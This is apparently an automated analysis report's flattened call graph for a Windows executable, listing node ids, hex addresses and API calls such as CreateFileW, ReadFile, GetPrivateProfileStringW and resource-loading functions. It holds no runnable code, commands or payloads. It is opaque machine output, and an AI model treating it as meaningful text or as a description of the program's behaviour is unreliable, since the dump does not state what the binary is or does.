39214->38640 39215->38649 39216->38649 39217->38649 39218->38649 39219->38641 39221 403a29 39220->39221 39235 403bed memset memset 39221->39235 39223 403ae7 39248 40b1ab free free 39223->39248 39224 403a3f memset 39228 403a2f 39224->39228 39226 403aef 39226->38658 39227 409d1f 6 API calls 39227->39228 39228->39223 39228->39224 39228->39227 39229 409b98 GetFileAttributesW 39228->39229 39230 40a8d0 7 API calls 39228->39230 39229->39228 39230->39228 39232 40a051 GetFileTime CloseHandle 39231->39232 39233 4039ca CompareFileTime 39231->39233 39232->39233 39233->38658 39234->38657 39236 414c2e 16 API calls 39235->39236 39237 403c38 39236->39237 39238 409719 2 API calls 39237->39238 39239 403c3f wcscat 39238->39239 39240 414c2e 16 API calls 39239->39240 39241 403c61 39240->39241 39242 409719 2 API calls 39241->39242 39243 403c68 wcscat 39242->39243 39249 403af5 39243->39249 39246 403af5 20 API calls 39247 403c95 39246->39247 39247->39228 39248->39226 39250 403b02 39249->39250 39251 40ae18 9 API calls 39250->39251 39260 403b37 39251->39260 39252 403bdb 39254 40aebe FindClose 39252->39254 39253 40add4 wcscmp wcscmp 39253->39260 39255 403be6 39254->39255 39255->39246 39256 40a8d0 7 API calls 39256->39260 39257 40ae18 9 API calls 39257->39260 39258 40ae51 9 API calls 39258->39260 39259 40aebe FindClose 39259->39260 39260->39252 39260->39253 39260->39256 39260->39257 39260->39258 39260->39259 39262 409d1f 6 API calls 39261->39262 39263 404190 39262->39263 39276 409b98 GetFileAttributesW 39263->39276 39265 40419c 39266 4041a7 6 API calls 39265->39266 39267 40435c 39265->39267 39268 40424f 39266->39268 39267->38679 39268->39267 39270 40425e memset 39268->39270 39272 409d1f 6 API calls 39268->39272 39273 40a8ab 9 API calls 39268->39273 39277 414842 39268->39277 39270->39268 39271 404296 wcscpy 39270->39271 39271->39268 39272->39268 39274 4042b6 memset memset _snwprintf wcscpy 39273->39274 39274->39268 39275->38683 39276->39265 39280 41443e 39277->39280 39279 414866 39279->39268 39281 41444b 39280->39281 39282 414451 39281->39282 39283 4144a3 GetPrivateProfileStringW 39281->39283 39284 414491 39282->39284 39285 414455 wcschr 39282->39285 39283->39279 39287 414495 WritePrivateProfileStringW 39284->39287 39285->39284 39286 414463 _snwprintf 39285->39286 39286->39287 39287->39279 39288->38688 39290 40b2cc 27 API calls 39289->39290 39291 409615 39290->39291 39292 409d1f 6 API calls 39291->39292 39293 409625 39292->39293 39316 409b98 GetFileAttributesW 39293->39316 39295 409634 39296 409648 39295->39296 39333 4091b8 238 API calls 39295->39333 39298 40b2cc 27 API calls 39296->39298 39300 408801 39296->39300 39299 40965d 39298->39299 39301 409d1f 6 API calls 39299->39301 39300->38691 39300->38723 39302 40966d 39301->39302 39317 409b98 GetFileAttributesW 39302->39317 39304 40967c 39304->39300 39318 409529 39304->39318 39306->38713 39316->39295 39317->39304 39334 4096c3 CreateFileW 39318->39334 39320 409543 39321 4095cd 39320->39321 39322 409550 GetFileSize 39320->39322 39321->39300 39323 409577 CloseHandle 39322->39323 39324 40955f 39322->39324 39323->39321 39329 409585 39323->39329 39325 40afcf 2 API calls 39324->39325 39326 409569 39325->39326 39335 40a2ef ReadFile 39326->39335 39328 409574 39328->39323 39329->39321 39330 4095c3 39329->39330 39336 408b8d 38 API calls 39329->39336 39337 40908b 55 API calls 39330->39337 39333->39296 39334->39320 39335->39328 39336->39329 39337->39321 39365 413f4f 39338->39365 39341 413f37 K32GetModuleFileNameExW 39342 413f4a 39341->39342 39342->38752 39344 413969 wcscpy 39343->39344 39345 41396c wcschr 39343->39345 39357 413a3a 39344->39357 39345->39344 39347 41398e 39345->39347 39369 4097f7 wcslen wcslen _memicmp 39347->39369 39349 41399a 39350 4139a4 memset 39349->39350 39351 4139e6 39349->39351 39370 409dd5 GetWindowsDirectoryW wcscpy 39350->39370 39353 413a31 wcscpy 39351->39353 39354 4139ec memset 39351->39354 39353->39357 39371 409dd5 GetWindowsDirectoryW wcscpy 39354->39371 39355 4139c9 wcscpy wcscat 39355->39357 39357->38752 39358 413a11 memcpy wcscat 39358->39357 39360 413cb0 GetModuleHandleW 39359->39360 39361 413cda 39359->39361 39360->39361 39362 413cbf 39360->39362 39363 413ce3 GetProcessTimes 39361->39363 39364 413cf6 39361->39364 39362->39361 39363->38754 39364->38754 39366 413f54 39365->39366 39368 413f2f 39365->39368 39367 40a804 8 API calls 39366->39367 39367->39368 39368->39341 39368->39342 39369->39349 39370->39355 39371->39358 39372->38774 39373->38797 39375 409cf9 GetVersionExW 39374->39375 39376 409d0a 39374->39376 39375->39376 39376->38804 39376->38808 39377->38811 39378->38814 39379->38816 39380->38861 39382 40bba5 39381->39382 39497 40cc26 39382->39497 39385 40bd4b 39518 40cc0c 39385->39518 39390 40b2cc 27 API calls 39391 40bbef 39390->39391 39525 40ccf0 _wcsicmp 39391->39525 39393 40bbf5 39393->39385 39526 40ccb4 6 API calls 39393->39526 39395 40bc26 39396 40cf04 17 API calls 39395->39396 39397 40bc2e 39396->39397 39398 40bd43 39397->39398 39399 40b2cc 27 API calls 39397->39399 39400 40cc0c 4 API calls 39398->39400 39401 40bc40 39399->39401 39400->39385 39527 40ccf0 _wcsicmp 39401->39527 39403 40bc46 39403->39398 39404 40bc61 memset memset WideCharToMultiByte 39403->39404 39528 40103c strlen 39404->39528 39406 40bcc0 39407 40b273 27 API calls 39406->39407 39408 40bcd0 memcmp 39407->39408 39408->39398 39409 40bce2 39408->39409 39410 404423 37 API calls 39409->39410 39411 40bd10 39410->39411 39411->39398 39412 40bd3a LocalFree 39411->39412 39413 40bd1f memcpy 39411->39413 39412->39398 39413->39412 39414->38876 39588 4438b5 39415->39588 39417 44444c 39418 40b879 39417->39418 39602 415a6d 39417->39602 39418->38879 39418->38880 39421 444486 39423 4444b9 memcpy 39421->39423 39460 4444a4 39421->39460 39422 44469e 39422->39418 39653 443d90 110 API calls 39422->39653 39606 415258 39423->39606 39426 444524 39427 444541 39426->39427 39428 44452a 39426->39428 39609 444316 39427->39609 39643 416935 16 API calls 39428->39643 39432 444316 18 API calls 39433 444563 39432->39433 39434 444316 18 API calls 39433->39434 39435 44456f 39434->39435 39436 444316 18 API calls 39435->39436 39437 44457f 39436->39437 39437->39460 39623 432d4e 39437->39623 39440 444316 18 API calls 39441 4445b0 39440->39441 39627 41eed2 39441->39627 39443 4445cf 39444 4445d6 39443->39444 39445 4445ee 39443->39445 39644 416935 16 API calls 39444->39644 39645 43302c memset 39445->39645 39447 4445fa 39646 43302c memset 39447->39646 39450 444609 39450->39460 39647 416935 16 API calls 39450->39647 39452 444646 39648 434d4b 17 API calls 39452->39648 39454 44464d 39649 437655 16 API calls 39454->39649 39456 444653 39650 4442e6 11 API calls 39456->39650 39458 44465d 39458->39460 39651 416935 16 API calls 39458->39651 39652 4442e6 11 API calls 39460->39652 39680 438460 39461->39680 39463 40b8a4 39463->38886 39467 4251c4 39463->39467 39465 409a74 GetTempFileNameW 39464->39465 39466 409a66 GetWindowsDirectoryW 39464->39466 39465->38873 39466->39465 39777 424f07 11 API calls 39467->39777 39469 4251e4 39470 4251f7 39469->39470 39471 4251e8 39469->39471 39779 4250f8 39470->39779 39778 4446ea 11 API calls 39471->39778 39473 4251f2 39473->38911 39475 425209 39478 425249 39475->39478 39481 4250f8 126 API calls 39475->39481 39482 425287 39475->39482 39787 4384e9 134 API calls 39475->39787 39788 424f74 123 API calls 39475->39788 39478->39482 39789 424ff0 13 API calls 39478->39789 39481->39475 39791 415c7d 16 API calls 39482->39791 39483 425266 39483->39482 39790 415be9 memcpy 39483->39790 39485->38911 39486->38911 39487->38911 39488->38911 39489->38911 39490->38911 39491->38911 39492->38911 39493->38911 39494->38886 39495->38879 39496->38908 39529 4096c3 CreateFileW 39497->39529 39499 40cc34 39500 40cc3d GetFileSize 39499->39500 39501 40bbca 39499->39501 39502 40afcf 2 API calls 39500->39502 39501->39385 39509 40cf04 39501->39509 39503 40cc64 39502->39503 39530 40a2ef ReadFile 39503->39530 39505 40cc71 39531 40ab4a MultiByteToWideChar 39505->39531 39507 40cc95 CloseHandle 39508 40b04b ??3@YAXPAX 39507->39508 39508->39501 39510 40b633 free 39509->39510 39511 40cf14 39510->39511 39537 40b1ab free free 39511->39537 39513 40bbdd 39513->39385 39513->39390 39514 40cf1b 39514->39513 39516 40cfef 39514->39516 39538 40cd4b 39514->39538 39517 40cd4b 14 API calls 39516->39517 39517->39513 39519 40b633 free 39518->39519 39520 40cc15 39519->39520 39521 40aa04 free 39520->39521 39522 40cc1d 39521->39522 39587 40b1ab free free 39522->39587 39524 40b7d4 memset CreateFileW 39524->38866 39524->38867 39525->39393 39526->39395 39527->39403 39528->39406 39529->39499 39530->39505 39532 40ab6b 39531->39532 39536 40ab93 39531->39536 39533 40a9ce 4 API calls 39532->39533 39534 40ab74 39533->39534 39535 40ab7c MultiByteToWideChar 39534->39535 39535->39536 39536->39507 39537->39514 39539 40cd7b 39538->39539 39572 40aa29 39539->39572 39541 40cef5 39542 40aa04 free 39541->39542 39543 40cefd 39542->39543 39543->39514 39545 40aa29 6 API calls 39546 40ce1d 39545->39546 39547 40aa29 6 API calls 39546->39547 39548 40ce3e 39547->39548 39549 40ce6a 39548->39549 39580 40abb7 wcslen memmove 39548->39580 39550 40ce9f 39549->39550 39583 40abb7 wcslen memmove 39549->39583 39553 40a8d0 7 API calls 39550->39553 39556 40ceb5 39553->39556 39554 40ce56 39581 40aa71 wcslen 39554->39581 39555 40ce8b 39584 40aa71 wcslen 39555->39584 39562 40a8d0 7 API calls 39556->39562 39559 40ce5e 39582 40abb7 wcslen memmove 39559->39582 39560 40ce93 39585 40abb7 wcslen memmove 39560->39585 39564 40cecb 39562->39564 39586 40d00b malloc memcpy free free 39564->39586 39566 40cedd 39567 40aa04 free 39566->39567 39568 40cee5 39567->39568 39569 40aa04 free 39568->39569 39570 40ceed 39569->39570 39571 40aa04 free 39570->39571 39571->39541 39573 40aa33 39572->39573 39579 40aa63 39572->39579 39574 40aa44 39573->39574 39575 40aa38 wcslen 39573->39575 39576 40a9ce malloc memcpy free free 39574->39576 39575->39574 39577 40aa4d 39576->39577 39578 40aa51 memcpy 39577->39578 39577->39579 39578->39579 39579->39541 39579->39545 39580->39554 39581->39559 39582->39549 39583->39555 39584->39560 39585->39550 39586->39566 39587->39524 39589 4438d0 39588->39589 39599 4438c9 39588->39599 39654 415378 memcpy memcpy 39589->39654 39599->39417 39603 415a77 39602->39603 39604 415a8d 39603->39604 39605 415a7e memset 39603->39605 39604->39421 39605->39604 39607 4438b5 11 API calls 39606->39607 39608 41525d 39607->39608 39608->39426 39610 444328 39609->39610 39611 444423 39610->39611 39612 44434e 39610->39612 39657 4446ea 11 API calls 39611->39657 39613 432d4e 3 API calls 39612->39613 39615 44435a 39613->39615 39617 444375 39615->39617 39622 44438b 39615->39622 39616 432d4e 3 API calls 39618 4443ec 39616->39618 39655 416935 16 API calls 39617->39655 39620 444381 39618->39620 39656 416935 16 API calls 39618->39656 39620->39432 39622->39616 39624 432d58 39623->39624 39626 432d65 39623->39626 39658 432cc4 memset memset memcpy 39624->39658 39626->39440 39628 41eee2 39627->39628 39629 415a6d memset 39628->39629 39630 41ef23 39629->39630 39631 415a6d memset 39630->39631 39642 41ef2d 39630->39642 39632 41ef42 39631->39632 39636 41ef49 39632->39636 39659 41b7d9 39632->39659 39634 41ef66 39635 41ef74 memset 39634->39635 39634->39636 39637 41ef91 39635->39637 39640 41ef9e 39635->39640 39636->39642 39674 41b321 100 API calls 39636->39674 39639 41519d 6 API calls 39637->39639 39639->39640 39640->39636 39673 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39640->39673 39642->39443 39643->39460 39644->39460 39645->39447 39646->39450 39647->39452 39648->39454 39649->39456 39650->39458 39651->39460 39652->39422 39653->39418 39655->39620 39656->39620 39657->39620 39658->39626 39665 41b812 39659->39665 39660 415a6d memset 39661 41b8c2 39660->39661 39662 41b980 39661->39662 39663 41b902 memcpy memcpy memcpy memcpy memcpy 39661->39663 39668 41b849 39661->39668 39670 41b9ad 39662->39670 39676 4151e3 39662->39676 39663->39662 39665->39668 39672 41b884 39665->39672 39675 444706 11 API calls 39665->39675 39667 41ba12 39667->39668 39669 41ba32 memset 39667->39669 39668->39634 39669->39668 39670->39668 39679 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39670->39679 39672->39660 39672->39668 39673->39636 39674->39642 39675->39672 39678 41837f 54 API calls 39676->39678 39677 4151f9 39677->39670 39678->39677 39679->39667 39692 41703f 39680->39692 39682 43847a 39683 43848a 39682->39683 39684 43847e 39682->39684 39699 438270 39683->39699 39729 4446ea 11 API calls 39684->39729 39689 4384bb 39690 438270 133 API calls 39689->39690 39691 438488 39690->39691 39691->39463 39693 417044 39692->39693 39694 41705c 39692->39694 39698 417055 39693->39698 39731 416760 11 API calls 39693->39731 39695 417075 39694->39695 39732 41707a 11 API calls 39694->39732 39695->39682 39698->39682 39733 415a91 39699->39733 39701 43828d 39702 438297 39701->39702 39703 438341 39701->39703 39705 4382d6 39701->39705 39776 415c7d 16 API calls 39702->39776 39737 44358f 39703->39737 39708 4382fb 39705->39708 39709 4382db 39705->39709 39707 438458 39707->39691 39730 424f26 122 API calls 39707->39730 39770 415c23 memcpy 39708->39770 39768 416935 16 API calls 39709->39768 39712 4382e9 39769 415c7d 16 API calls 39712->39769 39713 438305 39716 44358f 19 API calls 39713->39716 39718 438318 39713->39718 39715 438373 39722 438383 39715->39722 39771 4300e8 memset memset memcpy 39715->39771 39716->39718 39718->39715 39763 43819e 39718->39763 39720 4383f5 39725 438404 39720->39725 39726 43841c 39720->39726 39721 4383cd 39721->39720 39773 42453e 122 API calls 39721->39773 39722->39721 39772 415c23 memcpy 39722->39772 39774 416935 16 API calls 39725->39774 39775 416935 16 API calls 39726->39775 39729->39691 39730->39689 39731->39698 39732->39693 39734 415a9d 39733->39734 39735 415ab3 39734->39735 39736 415aa4 memset 39734->39736 39735->39701 39736->39735 39738 4435be 39737->39738 39739 443676 39738->39739 39742 4436ce 39738->39742 39745 442ff8 19 API calls 39738->39745 39747 44366c 39738->39747 39761 44360c 39738->39761 39740 443737 39739->39740 39743 442ff8 19 API calls 39739->39743 39746 443758 39739->39746 39744 442ff8 19 API calls 39740->39744 39741 441409 memset 39741->39746 39749 4165ff 11 API calls 39742->39749 39743->39740 39744->39746 39745->39738 39746->39741 39751 443775 39746->39751 39750 4169a7 11 API calls 39747->39750 39748 4437be 39752 416760 11 API calls 39748->39752 39753 4437de 39748->39753 39749->39739 39750->39739 39751->39748 39757 415c56 11 API calls 39751->39757 39752->39753 39754 42463b memset memcpy 39753->39754 39756 443801 39753->39756 39754->39756 39755 443826 39759 43bd08 memset 39755->39759 39756->39755 39758 43024d memset 39756->39758 39757->39748 39758->39755 39760 443837 39759->39760 39760->39761 39762 43024d memset 39760->39762 39761->39718 39762->39760 39764 438246 39763->39764 39766 4381ba 39763->39766 39764->39715 39765 41f432 109 API calls 39765->39766 39766->39764 39766->39765 39767 41f638 103 API calls 39766->39767 39767->39766 39768->39712 39769->39702 39770->39713 39771->39722 39772->39721 39773->39720 39774->39702 39775->39702 39776->39707 39777->39469 39778->39473 39780 425108 39779->39780 39786 42510d 39779->39786 39824 424f74 123 API calls 39780->39824 39783 42516e 39825 415c7d 16 API calls 39783->39825 39784 425115 39784->39475 39786->39784 39792 42569b 39786->39792 39787->39475 39788->39475 39789->39483 39790->39482 39791->39473 39803 4256f1 39792->39803 39820 4259c2 39792->39820 39797 4260dd 39837 424251 119 API calls 39797->39837 39798 429a4d 39805 429a66 39798->39805 39806 429a9b 39798->39806 39802 422aeb memset memcpy memcpy 39802->39803 39803->39798 39803->39802 39808 4260a1 39803->39808 39817 4259da 39803->39817 39818 429ac1 39803->39818 39803->39820 39823 425a38 39803->39823 39826 4227f0 memset memcpy 39803->39826 39827 422b84 15 API calls 39803->39827 39828 422b5d memset memcpy memcpy 39803->39828 39829 422640 13 API calls 39803->39829 39831 4241fc 11 API calls 39803->39831 39832 42413a 89 API calls 39803->39832 39838 415c56 11 API calls 39805->39838 39807 429a96 39806->39807 39840 416760 11 API calls 39806->39840 39841 424251 119 API calls 39807->39841 39835 415c56 11 API calls 39808->39835 39810 429a7a 39839 416760 11 API calls 39810->39839 39836 416760 11 API calls 39817->39836 39819 425ad6 39818->39819 39842 415c56 11 API calls 39818->39842 39819->39783 39820->39819 39830 415c56 11 API calls 39820->39830 39823->39820 39833 422640 13 API calls 39823->39833 39834 4226e0 12 API calls 39823->39834 39824->39786 39825->39784 39826->39803 39827->39803 39828->39803 39829->39803 39830->39817 39831->39803 39832->39803 39833->39823 39834->39823 39835->39817 39836->39797 39837->39819 39838->39810 39839->39807 39840->39807 39841->39818 39842->39817 39843->38946 39844->38954 39854 44def7 39855 44df07 39854->39855 39856 44df00 ??3@YAXPAX 39854->39856 39857 44df17 39855->39857 39858 44df10 ??3@YAXPAX 39855->39858 39856->39855 39859 44df27 39857->39859 39860 44df20 ??3@YAXPAX 39857->39860 39858->39857 39861 44df37 39859->39861 39862 44df30 ??3@YAXPAX 39859->39862 39860->39859 39862->39861 37716 44dea5 37717 44deb5 FreeLibrary 37716->37717 37718 44dec3 37716->37718 37717->37718 39863 4148b6 FindResourceW 39864 4148cf SizeofResource 39863->39864 39867 4148f9 39863->39867 39865 4148e0 LoadResource 39864->39865 39864->39867 39866 4148ee LockResource 39865->39866 39865->39867 39866->39867 39868 441b3f 39878 43a9f6 39868->39878 39870 441b61 40051 4386af memset 39870->40051 39872 44189a 39873 4418e2 39872->39873 39875 442bd4 39872->39875 39874 4418ea 39873->39874 40052 4414a9 12 API calls 39873->40052 39875->39874 40053 441409 memset 39875->40053 39879 43aa20 39878->39879 39886 43aadf 39878->39886 39880 43aa34 memset 39879->39880 39879->39886 39881 43aa56 39880->39881 39882 43aa4d 39880->39882 40054 43a6e7 39881->40054 40062 42c02e memset 39882->40062 39886->39870 39888 43aad3 40064 4169a7 11 API calls 39888->40064 39889 43aaae 39889->39886 39889->39888 39904 43aae5 39889->39904 39890 43ac18 39893 43ac47 39890->39893 40066 42bbd5 memcpy memcpy memcpy memset memcpy 39890->40066 39894 43aca8 39893->39894 40067 438eed 16 API calls 39893->40067 39898 43acd5 39894->39898 40069 4233ae 11 API calls 39894->40069 39897 43ac87 40068 4233c5 16 API calls 39897->40068 40070 423426 11 API calls 39898->40070 39902 43ace1 40071 439811 162 API calls 39902->40071 39903 43a9f6 160 API calls 39903->39904 39904->39886 39904->39890 39904->39903 40065 439bbb 22 API calls 39904->40065 39906 43acfd 39911 43ad2c 39906->39911 40072 438eed 16 API calls 39906->40072 39908 43ad19 40073 4233c5 16 API calls 39908->40073 39910 43ad58 40074 44081d 162 API calls 39910->40074 39911->39910 39914 43add9 39911->39914 39914->39914 40078 423426 11 API calls 39914->40078 39915 43ae3a memset 39916 43ae73 39915->39916 40079 42e1c0 146 API calls 39916->40079 39917 43adab 40076 438c4e 162 API calls 39917->40076 39918 43ad6c 39918->39886 39918->39917 40075 42370b memset memcpy memset 39918->40075 39922 43adcc 40077 440f84 12 API calls 39922->40077 39923 43ae96 40080 42e1c0 146 API calls 39923->40080 39926 43aea8 39929 43aec1 39926->39929 40081 42e199 146 API calls 39926->40081 39928 43af00 39928->39886 39933 43af1a 39928->39933 39934 43b3d9 39928->39934 39929->39928 40082 42e1c0 146 API calls 39929->40082 39930 43add4 39935 43b60f 39930->39935 40141 438f86 16 API calls 39930->40141 40083 438eed 16 API calls 39933->40083 39939 43b3f6 39934->39939 39944 43b4c8 39934->39944 39935->39886 40142 4393a5 17 API calls 39935->40142 39938 43af2f 40084 4233c5 16 API calls 39938->40084 40124 432878 12 API calls 39939->40124 39941 43af51 40085 423426 11 API calls 39941->40085 39943 43b4f2 40131 43a76c 21 API calls 39943->40131 39944->39943 40130 42bbd5 memcpy memcpy memcpy memset memcpy 39944->40130 39946 43af7d 40086 423426 11 API calls 39946->40086 39950 43af94 40087 423330 11 API calls 39950->40087 39951 43b529 40132 44081d 162 API calls 39951->40132 39952 43b462 40126 423330 11 API calls 39952->40126 39956 43b544 39960 43b55c 39956->39960 40133 42c02e memset 39956->40133 39957 43b428 39957->39952 40125 432b60 16 API calls 39957->40125 39958 43afca 40088 423330 11 API calls 39958->40088 39959 43b47e 39962 43b497 39959->39962 40127 42374a memcpy memset memcpy memcpy memcpy 39959->40127 40134 43a87a 162 API calls 39960->40134 40128 4233ae 11 API calls 39962->40128 39965 43afdb 40089 4233ae 11 API calls 39965->40089 39968 43b4b1 40129 423399 11 API calls 39968->40129 39970 43b56c 39973 43b58a 39970->39973 40135 423330 11 API calls 39970->40135 39972 43afee 40090 44081d 162 API calls 39972->40090 40136 440f84 12 API calls 39973->40136 39974 43b4c1 40138 42db80 162 API calls 39974->40138 39979 43b592 40137 43a82f 16 API calls 39979->40137 39982 43b5b4 40139 438c4e 162 API calls 39982->40139 39984 43b5cf 40140 42c02e memset 39984->40140 39986 43b005 39986->39886 39991 43b01f 39986->39991 40091 42d836 162 API calls 39986->40091 39987 43b1ef 40101 4233c5 16 API calls 39987->40101 39989 43b212 40102 423330 11 API calls 39989->40102 39991->39987 40099 423330 11 API calls 39991->40099 40100 42d71d 162 API calls 39991->40100 39993 43b087 40092 4233ae 11 API calls 39993->40092 39996 43b22a 40103 42ccb5 11 API calls 39996->40103 39999 43b23f 40104 4233ae 11 API calls 39999->40104 40000 43b10f 40095 423330 11 API calls 40000->40095 40002 43b257 40105 4233ae 11 API calls 40002->40105 40006 43b129 40096 4233ae 11 API calls 40006->40096 40007 43b26e 40106 4233ae 11 API calls 40007->40106 40010 43b09a 40010->40000 40093 42cc15 19 API calls 40010->40093 40094 4233ae 11 API calls 40010->40094 40012 43b282 40107 43a87a 162 API calls 40012->40107 40013 43b13c 40097 440f84 12 API calls 40013->40097 40015 43b29d 40108 423330 11 API calls 40015->40108 40018 43b15f 40098 4233ae 11 API calls 40018->40098 40019 43b2af 40021 43b2b8 40019->40021 40022 43b2ce 40019->40022 40109 4233ae 11 API calls 40021->40109 40110 440f84 12 API calls 40022->40110 40025 43b2c9 40112 4233ae 11 API calls 40025->40112 40026 43b2da 40111 42370b memset memcpy memset 40026->40111 40029 43b2f9 40113 423330 11 API calls 40029->40113 40031 43b30b 40114 423330 11 API calls 40031->40114 40033 43b325 40115 423399 11 API calls 40033->40115 40035 43b332 40116 4233ae 11 API calls 40035->40116 40037 43b354 40117 423399 11 API calls 40037->40117 40039 43b364 40118 43a82f 16 API calls 40039->40118 40041 43b370 40119 42db80 162 API calls 40041->40119 40043 43b380 40120 438c4e 162 API calls 40043->40120 40045 43b39e 40121 423399 11 API calls 40045->40121 40047 43b3ae 40122 43a76c 21 API calls 40047->40122 40049 43b3c3 40123 423399 11 API calls 40049->40123 40051->39872 40052->39874 40053->39875 40055 43a6f5 40054->40055 40056 43a765 40054->40056 40055->40056 40143 42a115 40055->40143 40056->39886 40063 4397fd memset 40056->40063 40060 43a73d 40060->40056 40061 42a115 146 API calls 40060->40061 40061->40056 40062->39881 40063->39889 40064->39886 40065->39904 40066->39893 40067->39897 40068->39894 40069->39898 40070->39902 40071->39906 40072->39908 40073->39911 40074->39918 40075->39917 40076->39922 40077->39930 40078->39915 40079->39923 40080->39926 40081->39929 40082->39929 40083->39938 40084->39941 40085->39946 40086->39950 40087->39958 40088->39965 40089->39972 40090->39986 40091->39993 40092->40010 40093->40010 40094->40010 40095->40006 40096->40013 40097->40018 40098->39991 40099->39991 40100->39991 40101->39989 40102->39996 40103->39999 40104->40002 40105->40007 40106->40012 40107->40015 40108->40019 40109->40025 40110->40026 40111->40025 40112->40029 40113->40031 40114->40033 40115->40035 40116->40037 40117->40039 40118->40041 40119->40043 40120->40045 40121->40047 40122->40049 40123->39930 40124->39957 40125->39952 40126->39959 40127->39962 40128->39968 40129->39974 40130->39943 40131->39951 40132->39956 40133->39960 40134->39970 40135->39973 40136->39979 40137->39974 40138->39982 40139->39984 40140->39930 40141->39935 40142->39886 40144 42a175 40143->40144 40146 42a122 40143->40146 40144->40056 40149 42b13b 146 API calls 40144->40149 40146->40144 40147 42a115 146 API calls 40146->40147 40150 43a174 40146->40150 40174 42a0a8 146 API calls 40146->40174 40147->40146 40149->40060 40164 43a196 40150->40164 40165 43a19e 40150->40165 40151 43a306 40151->40164 40188 4388c4 14 API calls 40151->40188 40154 42a115 146 API calls 40154->40165 40155 415a91 memset 40155->40165 40156 43a642 40156->40164 40193 4169a7 11 API calls 40156->40193 40160 43a635 40192 42c02e memset 40160->40192 40164->40146 40165->40151 40165->40154 40165->40155 40165->40164 40175 42ff8c 40165->40175 40183 4165ff 11 API calls 40165->40183 40184 439504 13 API calls 40165->40184 40185 4312d0 146 API calls 40165->40185 40186 42be4c memcpy memcpy memcpy memset memcpy 40165->40186 40187 43a121 11 API calls 40165->40187 40167 42bf4c 14 API calls 40169 43a325 40167->40169 40168 4169a7 11 API calls 40168->40169 40169->40156 40169->40160 40169->40164 40169->40167 40169->40168 40170 42b5b5 memset memcpy 40169->40170 40189 42b63e 14 API calls 40169->40189 40190 4165ff 11 API calls 40169->40190 40191 42bfcf memcpy 40169->40191 40170->40169 40174->40146 40194 43817e 40175->40194 40177 42ff99 40178 42ffe3 40177->40178 40179 42ffd0 40177->40179 40182 42ff9d 40177->40182 40199 4169a7 11 API calls 40178->40199 40198 4169a7 11 API calls 40179->40198 40182->40165 40183->40165 40184->40165 40185->40165 40186->40165 40187->40165 40188->40169 40189->40169 40190->40169 40191->40169 40192->40156 40193->40164 40195 438187 40194->40195 40197 438192 40194->40197 40200 4380f6 40195->40200 40197->40177 40198->40182 40199->40182 40202 43811f 40200->40202 40201 438164 40201->40197 40202->40201 40205 437e5e 40202->40205 40228 4300e8 memset memset memcpy 40202->40228 40229 437d3c 40205->40229 40207 437ea9 40208 437eb3 40207->40208 40214 437f22 40207->40214 40244 41f432 40207->40244 40208->40202 40211 437f06 40255 415c56 11 API calls 40211->40255 40213 437f95 40256 415c56 11 API calls 40213->40256 40215 437f7f 40214->40215 40216 432d4e 3 API calls 40214->40216 40215->40213 40217 43802b 40215->40217 40216->40215 40257 4165ff 11 API calls 40217->40257 40220 438054 40258 437371 137 API calls 40220->40258 40223 43806b 40224 438094 40223->40224 40259 42f50e 137 API calls 40223->40259 40225 437fa3 40224->40225 40260 4300e8 memset memset memcpy 40224->40260 40225->40208 40261 41f638 103 API calls 40225->40261 40228->40202 40230 437d69 40229->40230 40233 437d80 40229->40233 40262 437ccb 11 API calls 40230->40262 40232 437d76 40232->40207 40233->40232 40234 437da3 40233->40234 40237 437d90 40233->40237 40236 438460 133 API calls 40234->40236 40240 437dcb 40236->40240 40237->40232 40266 437ccb 11 API calls 40237->40266 40238 437de8 40265 424f26 122 API calls 40238->40265 40240->40238 40263 444283 13 API calls 40240->40263 40242 437dfc 40264 437ccb 11 API calls 40242->40264 40245 41f54d 40244->40245 40251 41f44f 40244->40251 40246 41f466 40245->40246 40296 41c635 memset memset 40245->40296 40246->40211 40246->40214 40251->40246 40253 41f50b 40251->40253 40267 41f1a5 40251->40267 40292 41c06f memcmp 40251->40292 40293 41f3b1 89 API calls 40251->40293 40294 41f398 85 API calls 40251->40294 40253->40245 40253->40246 40295 41c295 85 API calls 40253->40295 40255->40208 40256->40225 40257->40220 40258->40223 40259->40224 40260->40225 40261->40208 40262->40232 40263->40242 40264->40238 40265->40232 40266->40232 40268 41bc3b 100 API calls 40267->40268 40269 41f1b4 40268->40269 40270 41edad 85 API calls 40269->40270 40277 41f282 40269->40277 40271 41f1cb 40270->40271 40272 41f1f5 memcmp 40271->40272 40273 41f20e 40271->40273 40271->40277 40272->40273 40274 41f21b memcmp 40273->40274 40273->40277 40275 41f326 40274->40275 40278 41f23d 40274->40278 40276 41ee6b 85 API calls 40275->40276 40275->40277 40276->40277 40277->40251 40278->40275 40279 41f28e memcmp 40278->40279 40281 41c8df 55 API calls 40278->40281 40279->40275 40280 41f2a9 40279->40280 40280->40275 40283 41f308 40280->40283 40284 41f2d8 40280->40284 40282 41f269 40281->40282 40282->40275 40285 41f287 40282->40285 40286 41f27a 40282->40286 40283->40275 40290 4446ce 11 API calls 40283->40290 40287 41ee6b 85 API calls 40284->40287 40285->40279 40288 41ee6b 85 API calls 40286->40288 40289 41f2e0 40287->40289 40288->40277 40291 41b1ca memset 40289->40291 40290->40275 40291->40277 40292->40251 40293->40251 40294->40251 40295->40245 40296->40246 40328 41493c EnumResourceNamesW 37720 4287c1 37721 4287d2 37720->37721 37722 429ac1 37720->37722 37723 428818 37721->37723 37724 42881f 37721->37724 37739 425711 37721->37739 37734 425ad6 37722->37734 37790 415c56 11 API calls 37722->37790 37757 42013a 37723->37757 37785 420244 96 API calls 37724->37785 37728 4260dd 37784 424251 119 API calls 37728->37784 37732 4259da 37783 416760 11 API calls 37732->37783 37735 429a4d 37741 429a66 37735->37741 37742 429a9b 37735->37742 37738 422aeb memset memcpy memcpy 37738->37739 37739->37722 37739->37732 37739->37735 37739->37738 37744 4260a1 37739->37744 37753 4259c2 37739->37753 37756 425a38 37739->37756 37773 4227f0 memset memcpy 37739->37773 37774 422b84 15 API calls 37739->37774 37775 422b5d memset memcpy memcpy 37739->37775 37776 422640 13 API calls 37739->37776 37778 4241fc 11 API calls 37739->37778 37779 42413a 89 API calls 37739->37779 37786 415c56 11 API calls 37741->37786 37743 429a96 37742->37743 37788 416760 11 API calls 37742->37788 37789 424251 119 API calls 37743->37789 37782 415c56 11 API calls 37744->37782 37746 429a7a 37787 416760 11 API calls 37746->37787 37753->37734 37777 415c56 11 API calls 37753->37777 37756->37753 37780 422640 13 API calls 